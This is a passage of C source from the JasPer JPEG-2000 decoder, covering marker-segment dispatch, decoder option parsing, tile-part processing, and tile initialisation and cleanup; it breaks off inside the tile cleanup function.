* IS NOT FAULT-TOLERANT AND IS NOT INTENDED FOR USE IN MISSION-CRITICAL
* SYSTEMS, SUCH AS THOSE USED IN THE OPERATION OF NUCLEAR FACILITIES,
* AIRCRAFT NAVIGATION OR COMMUNICATION SYSTEMS, AIR TRAFFIC CONTROL
* SYSTEMS, DIRECT LIFE SUPPORT MACHINES, OR WEAPONS SYSTEMS, IN WHICH
* THE FAILURE OF THE SOFTWARE OR SYSTEM COULD LEAD DIRECTLY TO DEATH,
* PERSONAL INJURY, OR SEVERE PHYSICAL OR ENVIRONMENTAL DAMAGE ("HIGH
* RISK ACTIVITIES"). THE COPYRIGHT HOLDERS SPECIFICALLY DISCLAIM ANY
* EXPRESS OR IMPLIED WARRANTY OF FITNESS FOR HIGH RISK ACTIVITIES.
*
* __END_OF_JASPER_LICENSE__
*/
/*
* $Id$
*/
/******************************************************************************\
* Includes.
\******************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <inttypes.h>
#include "jasper/jas_types.h"
#include "jasper/jas_math.h"
#include "jasper/jas_tvp.h"
#include "jasper/jas_malloc.h"
#include "jasper/jas_debug.h"
#include "jpc_fix.h"
#include "jpc_dec.h"
#include "jpc_cs.h"
#include "jpc_mct.h"
#include "jpc_t2dec.h"
#include "jpc_t1dec.h"
#include "jpc_math.h"
/******************************************************************************\
*
\******************************************************************************/
#define JPC_MHSOC 0x0001
/* In the main header, expecting a SOC marker segment. */
#define JPC_MHSIZ 0x0002
/* In the main header, expecting a SIZ marker segment. */
#define JPC_MH 0x0004
/* In the main header, expecting "other" marker segments. */
#define JPC_TPHSOT 0x0008
/* In a tile-part header, expecting a SOT marker segment. */
#define JPC_TPH 0x0010
/* In a tile-part header, expecting "other" marker segments. */
#define JPC_MT 0x0020
/* In the main trailer. */
typedef struct {
uint_fast16_t id;
/* The marker segment type. */
int validstates;
/* The states in which this type of marker segment can be
validly encountered. */
int (*action)(jpc_dec_t *dec, jpc_ms_t *ms);
/* The action to take upon encountering this type of marker segment. */
} jpc_dec_mstabent_t;
/******************************************************************************\
*
\******************************************************************************/
/* COD/COC parameters have been specified. */
#define JPC_CSET 0x0001
/* QCD/QCC parameters have been specified. */
#define JPC_QSET 0x0002
/* COD/COC parameters set from a COC marker segment. */
#define JPC_COC 0x0004
/* QCD/QCC parameters set from a QCC marker segment. */
#define JPC_QCC 0x0008
/******************************************************************************\
* Local function prototypes.
\******************************************************************************/
static int jpc_dec_dump(jpc_dec_t *dec, FILE *out);
jpc_ppxstab_t *jpc_ppxstab_create(void);
void jpc_ppxstab_destroy(jpc_ppxstab_t *tab);
int jpc_ppxstab_grow(jpc_ppxstab_t *tab, int maxents);
int jpc_ppxstab_insert(jpc_ppxstab_t *tab, jpc_ppxstabent_t *ent);
jpc_streamlist_t *jpc_ppmstabtostreams(jpc_ppxstab_t *tab);
int jpc_pptstabwrite(jas_stream_t *out, jpc_ppxstab_t *tab);
jpc_ppxstabent_t *jpc_ppxstabent_create(void);
void jpc_ppxstabent_destroy(jpc_ppxstabent_t *ent);
int jpc_streamlist_numstreams(jpc_streamlist_t *streamlist);
jpc_streamlist_t *jpc_streamlist_create(void);
int jpc_streamlist_insert(jpc_streamlist_t *streamlist, int streamno,
jas_stream_t *stream);
jas_stream_t *jpc_streamlist_remove(jpc_streamlist_t *streamlist, int streamno);
void jpc_streamlist_destroy(jpc_streamlist_t *streamlist);
jas_stream_t *jpc_streamlist_get(jpc_streamlist_t *streamlist, int streamno);
static void jpc_dec_cp_resetflags(jpc_dec_cp_t *cp);
static jpc_dec_cp_t *jpc_dec_cp_create(uint_fast16_t numcomps);
static int jpc_dec_cp_isvalid(jpc_dec_cp_t *cp);
static jpc_dec_cp_t *jpc_dec_cp_copy(jpc_dec_cp_t *cp);
static int jpc_dec_cp_setfromcod(jpc_dec_cp_t *cp, jpc_cod_t *cod);
static int jpc_dec_cp_setfromcoc(jpc_dec_cp_t *cp, jpc_coc_t *coc);
static int jpc_dec_cp_setfromcox(jpc_dec_cp_t *cp, jpc_dec_ccp_t *ccp,
jpc_coxcp_t *compparms, int flags);
static int jpc_dec_cp_setfromqcd(jpc_dec_cp_t *cp, jpc_qcd_t *qcd);
static int jpc_dec_cp_setfromqcc(jpc_dec_cp_t *cp, jpc_qcc_t *qcc);
static int jpc_dec_cp_setfromqcx(jpc_dec_cp_t *cp, jpc_dec_ccp_t *ccp,
jpc_qcxcp_t *compparms, int flags);
static int jpc_dec_cp_setfromrgn(jpc_dec_cp_t *cp, jpc_rgn_t *rgn);
static int jpc_dec_cp_prepare(jpc_dec_cp_t *cp);
static void jpc_dec_cp_destroy(jpc_dec_cp_t *cp);
static int jpc_dec_cp_setfrompoc(jpc_dec_cp_t *cp, jpc_poc_t *poc, int reset);
static int jpc_pi_addpchgfrompoc(jpc_pi_t *pi, jpc_poc_t *poc);
static int jpc_dec_decode(jpc_dec_t *dec);
static jpc_dec_t *jpc_dec_create(jpc_dec_importopts_t *impopts, jas_stream_t *in);
static void jpc_dec_destroy(jpc_dec_t *dec);
static void jpc_dequantize(jas_matrix_t *x, jpc_fix_t absstepsize);
static void jpc_undo_roi(jas_matrix_t *x, int roishift, int bgshift, int numbps);
static jpc_fix_t jpc_calcabsstepsize(int stepsize, int numbits);
static int jpc_dec_tiledecode(jpc_dec_t *dec, jpc_dec_tile_t *tile);
static int jpc_dec_tileinit(jpc_dec_t *dec, jpc_dec_tile_t *tile);
static int jpc_dec_tilefini(jpc_dec_t *dec, jpc_dec_tile_t *tile);
static int jpc_dec_process_soc(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_sot(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_sod(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_eoc(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_siz(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_cod(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_coc(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_rgn(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_qcd(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_qcc(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_poc(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_ppm(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_ppt(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_com(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_unk(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_crg(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_parseopts(char *optstr, jpc_dec_importopts_t *opts);
static jpc_dec_mstabent_t *jpc_dec_mstab_lookup(uint_fast16_t id);
/******************************************************************************\
* Global data.
\******************************************************************************/
jpc_dec_mstabent_t jpc_dec_mstab[] = {
{JPC_MS_SOC, JPC_MHSOC, jpc_dec_process_soc},
{JPC_MS_SOT, JPC_MH | JPC_TPHSOT, jpc_dec_process_sot},
{JPC_MS_SOD, JPC_TPH, jpc_dec_process_sod},
{JPC_MS_EOC, JPC_TPHSOT, jpc_dec_process_eoc},
{JPC_MS_SIZ, JPC_MHSIZ, jpc_dec_process_siz},
{JPC_MS_COD, JPC_MH | JPC_TPH, jpc_dec_process_cod},
{JPC_MS_COC, JPC_MH | JPC_TPH, jpc_dec_process_coc},
{JPC_MS_RGN, JPC_MH | JPC_TPH, jpc_dec_process_rgn},
{JPC_MS_QCD, JPC_MH | JPC_TPH, jpc_dec_process_qcd},
{JPC_MS_QCC, JPC_MH | JPC_TPH, jpc_dec_process_qcc},
{JPC_MS_POC, JPC_MH | JPC_TPH, jpc_dec_process_poc},
{JPC_MS_TLM, JPC_MH, 0},
{JPC_MS_PLM, JPC_MH, 0},
{JPC_MS_PLT, JPC_TPH, 0},
{JPC_MS_PPM, JPC_MH, jpc_dec_process_ppm},
{JPC_MS_PPT, JPC_TPH, jpc_dec_process_ppt},
{JPC_MS_SOP, 0, 0},
{JPC_MS_CRG, JPC_MH, jpc_dec_process_crg},
{JPC_MS_COM, JPC_MH | JPC_TPH, jpc_dec_process_com},
{0, JPC_MH | JPC_TPH, jpc_dec_process_unk}
};
/******************************************************************************\
* The main entry point for the JPEG-2000 decoder.
\******************************************************************************/
jas_image_t *jpc_decode(jas_stream_t *in, char *optstr)
{
jpc_dec_importopts_t opts;
jpc_dec_t *dec;
jas_image_t *image;
dec = 0;
if (jpc_dec_parseopts(optstr, &opts)) {
goto error;
}
jpc_initluts();
if (!(dec = jpc_dec_create(&opts, in))) {
goto error;
}
/* Do most of the work. */
if (jpc_dec_decode(dec)) {
goto error;
}
if (jas_image_numcmpts(dec->image) >= 3) {
jas_image_setclrspc(dec->image, JAS_CLRSPC_SRGB);
jas_image_setcmpttype(dec->image, 0,
JAS_IMAGE_CT_COLOR(JAS_CLRSPC_CHANIND_RGB_R));
jas_image_setcmpttype(dec->image, 1,
JAS_IMAGE_CT_COLOR(JAS_CLRSPC_CHANIND_RGB_G));
jas_image_setcmpttype(dec->image, 2,
JAS_IMAGE_CT_COLOR(JAS_CLRSPC_CHANIND_RGB_B));
} else {
jas_image_setclrspc(dec->image, JAS_CLRSPC_SGRAY);
jas_image_setcmpttype(dec->image, 0,
JAS_IMAGE_CT_COLOR(JAS_CLRSPC_CHANIND_GRAY_Y));
}
/* Save the return value. */
image = dec->image;
/* Stop the image from being discarded. */
dec->image = 0;
/* Destroy decoder. */
jpc_dec_destroy(dec);
return image;
error:
if (dec) {
jpc_dec_destroy(dec);
}
return 0;
}
typedef enum {
OPT_MAXLYRS,
OPT_MAXPKTS,
OPT_DEBUG
} optid_t;
jas_taginfo_t decopts[] = {
{OPT_MAXLYRS, "maxlyrs"},
{OPT_MAXPKTS, "maxpkts"},
{OPT_DEBUG, "debug"},
{-1, 0}
};
static int jpc_dec_parseopts(char *optstr, jpc_dec_importopts_t *opts)
{
jas_tvparser_t *tvp;
opts->debug = 0;
opts->maxlyrs = JPC_MAXLYRS;
opts->maxpkts = -1;
if (!(tvp = jas_tvparser_create(optstr ? optstr : ""))) {
return -1;
}
while (!jas_tvparser_next(tvp)) {
switch (jas_taginfo_nonull(jas_taginfos_lookup(decopts,
jas_tvparser_gettag(tvp)))->id) {
case OPT_MAXLYRS:
opts->maxlyrs = atoi(jas_tvparser_getval(tvp));
break;
case OPT_DEBUG:
opts->debug = atoi(jas_tvparser_getval(tvp));
break;
case OPT_MAXPKTS:
opts->maxpkts = atoi(jas_tvparser_getval(tvp));
break;
default:
jas_eprintf("warning: ignoring invalid option %s\n",
jas_tvparser_gettag(tvp));
break;
}
}
jas_tvparser_destroy(tvp);
return 0;
}
/******************************************************************************\
* Code for table-driven code stream decoder.
\******************************************************************************/
static jpc_dec_mstabent_t *jpc_dec_mstab_lookup(uint_fast16_t id)
{
jpc_dec_mstabent_t *mstabent;
for (mstabent = jpc_dec_mstab; mstabent->id != 0; ++mstabent) {
if (mstabent->id == id) {
break;
}
}
return mstabent;
}
static int jpc_dec_decode(jpc_dec_t *dec)
{
jpc_ms_t *ms;
jpc_dec_mstabent_t *mstabent;
int ret;
jpc_cstate_t *cstate;
if (!(cstate = jpc_cstate_create())) {
return -1;
}
dec->cstate = cstate;
/* Initially, we should expect to encounter a SOC marker segment. */
dec->state = JPC_MHSOC;
for (;;) {
/* Get the next marker segment in the code stream. */
if (!(ms = jpc_getms(dec->in, cstate))) {
jas_eprintf("cannot get marker segment\n");
return -1;
}
mstabent = jpc_dec_mstab_lookup(ms->id);
assert(mstabent);
/* Ensure that this type of marker segment is permitted
at this point in the code stream. */
if (!(dec->state & mstabent->validstates)) {
jas_eprintf("unexpected marker segment type\n");
jpc_ms_destroy(ms);
return -1;
}
/* Process the marker segment. */
if (mstabent->action) {
ret = (*mstabent->action)(dec, ms);
} else {
/* No explicit action is required. */
ret = 0;
}
/* Destroy the marker segment. */
jpc_ms_destroy(ms);
if (ret < 0) {
return -1;
} else if (ret > 0) {
break;
}
}
return 0;
}
static int jpc_dec_process_crg(jpc_dec_t *dec, jpc_ms_t *ms)
{
int cmptno;
jpc_dec_cmpt_t *cmpt;
jpc_crg_t *crg;
crg = &ms->parms.crg;
for (cmptno = 0, cmpt = dec->cmpts; cmptno < dec->numcomps; ++cmptno,
++cmpt) {
/* Ignore the information in the CRG marker segment for now.
This information serves no useful purpose for decoding anyhow.
Some other parts of the code need to be changed if these lines
are uncommented.
cmpt->hsubstep = crg->comps[cmptno].hoff;
cmpt->vsubstep = crg->comps[cmptno].voff;
*/
}
return 0;
}
static int jpc_dec_process_soc(jpc_dec_t *dec, jpc_ms_t *ms)
{
/* Eliminate warnings about unused variables. */
ms = 0;
/* We should expect to encounter a SIZ marker segment next. */
dec->state = JPC_MHSIZ;
return 0;
}
static int jpc_dec_process_sot(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_dec_tile_t *tile;
jpc_sot_t *sot = &ms->parms.sot;
jas_image_cmptparm_t *compinfos;
jas_image_cmptparm_t *compinfo;
jpc_dec_cmpt_t *cmpt;
int cmptno;
if (dec->state == JPC_MH) {
if (!(compinfos = jas_alloc2(dec->numcomps,
sizeof(jas_image_cmptparm_t)))) {
abort();
}
for (cmptno = 0, cmpt = dec->cmpts, compinfo = compinfos;
cmptno < dec->numcomps; ++cmptno, ++cmpt, ++compinfo) {
compinfo->tlx = 0;
compinfo->tly = 0;
compinfo->prec = cmpt->prec;
compinfo->sgnd = cmpt->sgnd;
compinfo->width = cmpt->width;
compinfo->height = cmpt->height;
compinfo->hstep = cmpt->hstep;
compinfo->vstep = cmpt->vstep;
}
if (!(dec->image = jas_image_create(dec->numcomps, compinfos,
JAS_CLRSPC_UNKNOWN))) {
jas_free(compinfos);
return -1;
}
jas_free(compinfos);
/* Is the packet header information stored in PPM marker segments in
the main header? */
if (dec->ppmstab) {
/* Convert the PPM marker segment data into a collection of streams
(one stream per tile-part). */
if (!(dec->pkthdrstreams = jpc_ppmstabtostreams(dec->ppmstab))) {
abort();
}
jpc_ppxstab_destroy(dec->ppmstab);
dec->ppmstab = 0;
}
}
if (sot->len > 0) {
dec->curtileendoff = jas_stream_getrwcount(dec->in) - ms->len -
4 + sot->len;
} else {
dec->curtileendoff = 0;
}
if (JAS_CAST(int, sot->tileno) >= dec->numtiles) {
jas_eprintf("invalid tile number in SOT marker segment\n");
return -1;
}
/* Set the current tile. */
dec->curtile = &dec->tiles[sot->tileno];
tile = dec->curtile;
/* Ensure that this is the expected part number. */
if (sot->partno != tile->partno) {
return -1;
}
if (tile->numparts > 0 && sot->partno >= tile->numparts) {
return -1;
}
if (!tile->numparts && sot->numparts > 0) {
tile->numparts = sot->numparts;
}
tile->pptstab = 0;
switch (tile->state) {
case JPC_TILE_INIT:
/* This is the first tile-part for this tile. */
tile->state = JPC_TILE_ACTIVE;
assert(!tile->cp);
if (!(tile->cp = jpc_dec_cp_copy(dec->cp))) {
return -1;
}
jpc_dec_cp_resetflags(dec->cp);
break;
default:
if (sot->numparts == sot->partno - 1) {
tile->state = JPC_TILE_ACTIVELAST;
}
break;
}
/* Note: We do not increment the expected tile-part number until
all processing for this tile-part is complete. */
/* We should expect to encounter other tile-part header marker
segments next. */
dec->state = JPC_TPH;
return 0;
}
static int jpc_dec_process_sod(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_dec_tile_t *tile;
int pos;
/* Eliminate compiler warnings about unused variables. */
ms = 0;
if (!(tile = dec->curtile)) {
return -1;
}
if (!tile->partno) {
if (!jpc_dec_cp_isvalid(tile->cp)) {
return -1;
}
jpc_dec_cp_prepare(tile->cp);
if (jpc_dec_tileinit(dec, tile)) {
return -1;
}
}
/* Are packet headers stored in the main header or tile-part header? */
if (dec->pkthdrstreams) {
/* Get the stream containing the packet header data for this
tile-part. */
if (!(tile->pkthdrstream = jpc_streamlist_remove(dec->pkthdrstreams, 0))) {
return -1;
}
}
if (tile->pptstab) {
if (!tile->pkthdrstream) {
if (!(tile->pkthdrstream = jas_stream_memopen(0, 0))) {
return -1;
}
}
pos = jas_stream_tell(tile->pkthdrstream);
jas_stream_seek(tile->pkthdrstream, 0, SEEK_END);
if (jpc_pptstabwrite(tile->pkthdrstream, tile->pptstab)) {
return -1;
}
jas_stream_seek(tile->pkthdrstream, pos, SEEK_SET);
jpc_ppxstab_destroy(tile->pptstab);
tile->pptstab = 0;
}
if (jas_getdbglevel() >= 10) {
jpc_dec_dump(dec, stderr);
}
if (jpc_dec_decodepkts(dec, (tile->pkthdrstream) ? tile->pkthdrstream :
dec->in, dec->in)) {
jas_eprintf("jpc_dec_decodepkts failed\n");
return -1;
}
/* Gobble any unconsumed tile data. */
if (dec->curtileendoff > 0) {
long curoff;
uint_fast32_t n;
curoff = jas_stream_getrwcount(dec->in);
if (curoff < dec->curtileendoff) {
n = dec->curtileendoff - curoff;
jas_eprintf("warning: ignoring trailing garbage (%lu bytes)\n",
(unsigned long) n);
while (n-- > 0) {
if (jas_stream_getc(dec->in) == EOF) {
jas_eprintf("read error\n");
return -1;
}
}
} else if (curoff > dec->curtileendoff) {
jas_eprintf("warning: not enough tile data (%lu bytes)\n",
(unsigned long) curoff - dec->curtileendoff);
}
}
if (tile->numparts > 0 && tile->partno == tile->numparts - 1) {
if (jpc_dec_tiledecode(dec, tile)) {
return -1;
}
jpc_dec_tilefini(dec, tile);
}
dec->curtile = 0;
/* Increment the expected tile-part number. */
++tile->partno;
/* We should expect to encounter a SOT marker segment next. */
dec->state = JPC_TPHSOT;
return 0;
}
static int jpc_dec_tileinit(jpc_dec_t *dec, jpc_dec_tile_t *tile)
{
jpc_dec_tcomp_t *tcomp;
int compno;
int rlvlno;
jpc_dec_rlvl_t *rlvl;
jpc_dec_band_t *band;
jpc_dec_prc_t *prc;
int bndno;
jpc_tsfb_band_t *bnd;
int bandno;
jpc_dec_ccp_t *ccp;
int prccnt;
jpc_dec_cblk_t *cblk;
int cblkcnt;
uint_fast32_t tlprcxstart;
uint_fast32_t tlprcystart;
uint_fast32_t brprcxend;
uint_fast32_t brprcyend;
uint_fast32_t tlcbgxstart;
uint_fast32_t tlcbgystart;
uint_fast32_t brcbgxend;
uint_fast32_t brcbgyend;
uint_fast32_t cbgxstart;
uint_fast32_t cbgystart;
uint_fast32_t cbgxend;
uint_fast32_t cbgyend;
uint_fast32_t tlcblkxstart;
uint_fast32_t tlcblkystart;
uint_fast32_t brcblkxend;
uint_fast32_t brcblkyend;
uint_fast32_t cblkxstart;
uint_fast32_t cblkystart;
uint_fast32_t cblkxend;
uint_fast32_t cblkyend;
uint_fast32_t tmpxstart;
uint_fast32_t tmpystart;
uint_fast32_t tmpxend;
uint_fast32_t tmpyend;
jpc_dec_cp_t *cp;
jpc_tsfb_band_t bnds[64];
jpc_pchg_t *pchg;
int pchgno;
jpc_dec_cmpt_t *cmpt;
cp = tile->cp;
tile->realmode = 0;
if (cp->mctid == JPC_MCT_ICT) {
tile->realmode = 1;
}
for (compno = 0, tcomp = tile->tcomps, cmpt = dec->cmpts; compno <
dec->numcomps; ++compno, ++tcomp, ++cmpt) {
ccp = &tile->cp->ccps[compno];
if (ccp->qmfbid == JPC_COX_INS) {
tile->realmode = 1;
}
tcomp->numrlvls = ccp->numrlvls;
if (!(tcomp->rlvls = jas_alloc2(tcomp->numrlvls,
sizeof(jpc_dec_rlvl_t)))) {
return -1;
}
if (!(tcomp->data = jas_seq2d_create(JPC_CEILDIV(tile->xstart,
cmpt->hstep), JPC_CEILDIV(tile->ystart, cmpt->vstep),
JPC_CEILDIV(tile->xend, cmpt->hstep), JPC_CEILDIV(tile->yend,
cmpt->vstep)))) {
return -1;
}
if (!(tcomp->tsfb = jpc_cod_gettsfb(ccp->qmfbid,
tcomp->numrlvls - 1))) {
return -1;
}
{
jpc_tsfb_getbands(tcomp->tsfb, jas_seq2d_xstart(tcomp->data),
jas_seq2d_ystart(tcomp->data), jas_seq2d_xend(tcomp->data),
jas_seq2d_yend(tcomp->data), bnds);
}
for (rlvlno = 0, rlvl = tcomp->rlvls; rlvlno < tcomp->numrlvls;
++rlvlno, ++rlvl) {
rlvl->bands = 0;
rlvl->xstart = JPC_CEILDIVPOW2(tcomp->xstart,
tcomp->numrlvls - 1 - rlvlno);
rlvl->ystart = JPC_CEILDIVPOW2(tcomp->ystart,
tcomp->numrlvls - 1 - rlvlno);
rlvl->xend = JPC_CEILDIVPOW2(tcomp->xend,
tcomp->numrlvls - 1 - rlvlno);
rlvl->yend = JPC_CEILDIVPOW2(tcomp->yend,
tcomp->numrlvls - 1 - rlvlno);
rlvl->prcwidthexpn = ccp->prcwidthexpns[rlvlno];
rlvl->prcheightexpn = ccp->prcheightexpns[rlvlno];
tlprcxstart = JPC_FLOORDIVPOW2(rlvl->xstart,
rlvl->prcwidthexpn) << rlvl->prcwidthexpn;
tlprcystart = JPC_FLOORDIVPOW2(rlvl->ystart,
rlvl->prcheightexpn) << rlvl->prcheightexpn;
brprcxend = JPC_CEILDIVPOW2(rlvl->xend,
rlvl->prcwidthexpn) << rlvl->prcwidthexpn;
brprcyend = JPC_CEILDIVPOW2(rlvl->yend,
rlvl->prcheightexpn) << rlvl->prcheightexpn;
rlvl->numhprcs = (brprcxend - tlprcxstart) >>
rlvl->prcwidthexpn;
rlvl->numvprcs = (brprcyend - tlprcystart) >>
rlvl->prcheightexpn;
rlvl->numprcs = rlvl->numhprcs * rlvl->numvprcs;
if (rlvl->xstart >= rlvl->xend || rlvl->ystart >= rlvl->yend) {
rlvl->bands = 0;
rlvl->numprcs = 0;
rlvl->numhprcs = 0;
rlvl->numvprcs = 0;
continue;
}
if (!rlvlno) {
tlcbgxstart = tlprcxstart;
tlcbgystart = tlprcystart;
brcbgxend = brprcxend;
brcbgyend = brprcyend;
rlvl->cbgwidthexpn = rlvl->prcwidthexpn;
rlvl->cbgheightexpn = rlvl->prcheightexpn;
} else {
tlcbgxstart = JPC_CEILDIVPOW2(tlprcxstart, 1);
tlcbgystart = JPC_CEILDIVPOW2(tlprcystart, 1);
brcbgxend = JPC_CEILDIVPOW2(brprcxend, 1);
brcbgyend = JPC_CEILDIVPOW2(brprcyend, 1);
rlvl->cbgwidthexpn = rlvl->prcwidthexpn - 1;
rlvl->cbgheightexpn = rlvl->prcheightexpn - 1;
}
rlvl->cblkwidthexpn = JAS_MIN(ccp->cblkwidthexpn,
rlvl->cbgwidthexpn);
rlvl->cblkheightexpn = JAS_MIN(ccp->cblkheightexpn,
rlvl->cbgheightexpn);
rlvl->numbands = (!rlvlno) ? 1 : 3;
if (!(rlvl->bands = jas_alloc2(rlvl->numbands,
sizeof(jpc_dec_band_t)))) {
return -1;
}
for (bandno = 0, band = rlvl->bands;
bandno < rlvl->numbands; ++bandno, ++band) {
bndno = (!rlvlno) ? 0 : (3 * (rlvlno - 1) +
bandno + 1);
bnd = &bnds[bndno];
band->orient = bnd->orient;
band->stepsize = ccp->stepsizes[bndno];
band->analgain = JPC_NOMINALGAIN(ccp->qmfbid,
tcomp->numrlvls - 1, rlvlno, band->orient);
band->absstepsize = jpc_calcabsstepsize(band->stepsize,
cmpt->prec + band->analgain);
band->numbps = ccp->numguardbits +
JPC_QCX_GETEXPN(band->stepsize) - 1;
band->roishift = (ccp->roishift + band->numbps >= JPC_PREC) ?
(JPC_PREC - 1 - band->numbps) : ccp->roishift;
band->data = 0;
band->prcs = 0;
if (bnd->xstart == bnd->xend || bnd->ystart == bnd->yend) {
continue;
}
if (!(band->data = jas_seq2d_create(0, 0, 0, 0))) {
return -1;
}
jas_seq2d_bindsub(band->data, tcomp->data, bnd->locxstart,
bnd->locystart, bnd->locxend, bnd->locyend);
jas_seq2d_setshift(band->data, bnd->xstart, bnd->ystart);
assert(rlvl->numprcs);
if (!(band->prcs = jas_alloc2(rlvl->numprcs,
sizeof(jpc_dec_prc_t)))) {
return -1;
}
/************************************************/
cbgxstart = tlcbgxstart;
cbgystart = tlcbgystart;
for (prccnt = rlvl->numprcs, prc = band->prcs;
prccnt > 0; --prccnt, ++prc) {
cbgxend = cbgxstart + (1 << rlvl->cbgwidthexpn);
cbgyend = cbgystart + (1 << rlvl->cbgheightexpn);
prc->xstart = JAS_MAX(cbgxstart, JAS_CAST(uint_fast32_t,
jas_seq2d_xstart(band->data)));
prc->ystart = JAS_MAX(cbgystart, JAS_CAST(uint_fast32_t,
jas_seq2d_ystart(band->data)));
prc->xend = JAS_MIN(cbgxend, JAS_CAST(uint_fast32_t,
jas_seq2d_xend(band->data)));
prc->yend = JAS_MIN(cbgyend, JAS_CAST(uint_fast32_t,
jas_seq2d_yend(band->data)));
if (prc->xend > prc->xstart && prc->yend > prc->ystart) {
tlcblkxstart = JPC_FLOORDIVPOW2(prc->xstart,
rlvl->cblkwidthexpn) << rlvl->cblkwidthexpn;
tlcblkystart = JPC_FLOORDIVPOW2(prc->ystart,
rlvl->cblkheightexpn) << rlvl->cblkheightexpn;
brcblkxend = JPC_CEILDIVPOW2(prc->xend,
rlvl->cblkwidthexpn) << rlvl->cblkwidthexpn;
brcblkyend = JPC_CEILDIVPOW2(prc->yend,
rlvl->cblkheightexpn) << rlvl->cblkheightexpn;
prc->numhcblks = (brcblkxend - tlcblkxstart) >>
rlvl->cblkwidthexpn;
prc->numvcblks = (brcblkyend - tlcblkystart) >>
rlvl->cblkheightexpn;
prc->numcblks = prc->numhcblks * prc->numvcblks;
assert(prc->numcblks > 0);
if (!(prc->incltagtree = jpc_tagtree_create(
prc->numhcblks, prc->numvcblks))) {
return -1;
}
if (!(prc->numimsbstagtree = jpc_tagtree_create(
prc->numhcblks, prc->numvcblks))) {
return -1;
}
if (!(prc->cblks = jas_alloc2(prc->numcblks,
sizeof(jpc_dec_cblk_t)))) {
return -1;
}
cblkxstart = cbgxstart;
cblkystart = cbgystart;
for (cblkcnt = prc->numcblks, cblk = prc->cblks; cblkcnt > 0;) {
cblkxend = cblkxstart + (1 << rlvl->cblkwidthexpn);
cblkyend = cblkystart + (1 << rlvl->cblkheightexpn);
tmpxstart = JAS_MAX(cblkxstart, prc->xstart);
tmpystart = JAS_MAX(cblkystart, prc->ystart);
tmpxend = JAS_MIN(cblkxend, prc->xend);
tmpyend = JAS_MIN(cblkyend, prc->yend);
if (tmpxend > tmpxstart && tmpyend > tmpystart) {
cblk->firstpassno = -1;
cblk->mqdec = 0;
cblk->nulldec = 0;
cblk->flags = 0;
cblk->numpasses = 0;
cblk->segs.head = 0;
cblk->segs.tail = 0;
cblk->curseg = 0;
cblk->numimsbs = 0;
cblk->numlenbits = 3;
cblk->flags = 0;
if (!(cblk->data = jas_seq2d_create(0, 0, 0, 0))) {
return -1;
}
jas_seq2d_bindsub(cblk->data, band->data,
tmpxstart, tmpystart, tmpxend, tmpyend);
++cblk;
--cblkcnt;
}
cblkxstart += 1 << rlvl->cblkwidthexpn;
if (cblkxstart >= cbgxend) {
cblkxstart = cbgxstart;
cblkystart += 1 << rlvl->cblkheightexpn;
}
}
} else {
prc->cblks = 0;
prc->incltagtree = 0;
prc->numimsbstagtree = 0;
}
cbgxstart += 1 << rlvl->cbgwidthexpn;
if (cbgxstart >= brcbgxend) {
cbgxstart = tlcbgxstart;
cbgystart += 1 << rlvl->cbgheightexpn;
}
}
/********************************************/
}
}
}
if (!(tile->pi = jpc_dec_pi_create(dec, tile))) {
return -1;
}
for (pchgno = 0; pchgno < jpc_pchglist_numpchgs(tile->cp->pchglist);
++pchgno) {
pchg = jpc_pchg_copy(jpc_pchglist_get(tile->cp->pchglist, pchgno));
assert(pchg);
jpc_pi_addpchg(tile->pi, pchg);
}
jpc_pi_init(tile->pi);
return 0;
}
static int jpc_dec_tilefini(jpc_dec_t *dec, jpc_dec_tile_t *tile)
{
jpc_dec_tcomp_t *tcomp;
int compno;
int bandno;
int rlvlno;
jpc_dec_band_t *band;
jpc_dec_rlvl_t *rlvl;
int prcno;
jpc_dec_prc_t *prc;
jpc_dec_seg_t *seg;
jpc_dec_cblk_t *cblk;
int cblkno;
if (tile->tcomps) {
for (compno = 0, tcomp = tile->tcomps; compno < dec->numcomps;
++compno, ++tcomp) {
for (rlvlno = 0, rlvl = tcomp->rlvls; rlvlno < tcomp->numrlvls;
++rlvlno, ++rlvl) {
if (!rlvl->bands) {
continue;
}
for (bandno = 0, band = rlvl->bands; bandno < rlvl->numbands;
++bandno, ++band) {
if (band->prcs) {
for (prcno = 0, prc = band->prcs; prcno <
rlvl->numprcs; ++prcno, ++prc) {
if (!prc->cblks) {
continue;
}
for (cblkno = 0, cblk = prc->cblks; cblkno <
prc->numcblks; ++cblkno, ++cblk) {
while (cblk->segs.head) {
seg = cblk->segs.head;
jpc_seglist_remove(&cblk->segs, seg);
jpc_seg_destroy(seg);
}
jas_matrix_destroy(cblk->data);
if (cblk->mqdec) {
jpc_mqdec_destroy(cblk->mqdec);
}
if (cblk->nulldec) {
jpc_bitstream_close(cblk->nulldec);
}
if (cblk->flags) {
jas_matrix_destroy(cblk->flags);
}
}
if (prc->incltagtree) {
jpc_tagtree_destroy(prc->incltagtree);
}
if (prc->numimsbstagtree) {
jpc_tagtree_destroy(prc->numimsbstagtree);
}
if (prc->cblks) {
jas_free(prc->cblks);
}
}
}
if (band->data) {
jas_matrix_destroy(band->data);
}
if (band->prcs) {
jas_free(band->prcs);
}
}
if (rlvl->bands) {
jas_free(rlvl->bands);
}
}
if (tcomp->rlvls) {
jas_free(tcomp->rlvls);
}
if (tcomp->data) {
jas_matrix_destroy(tcomp->data);
}
if (tcomp->tsfb) {
jpc_tsfb_destroy(tcomp->tsfb);
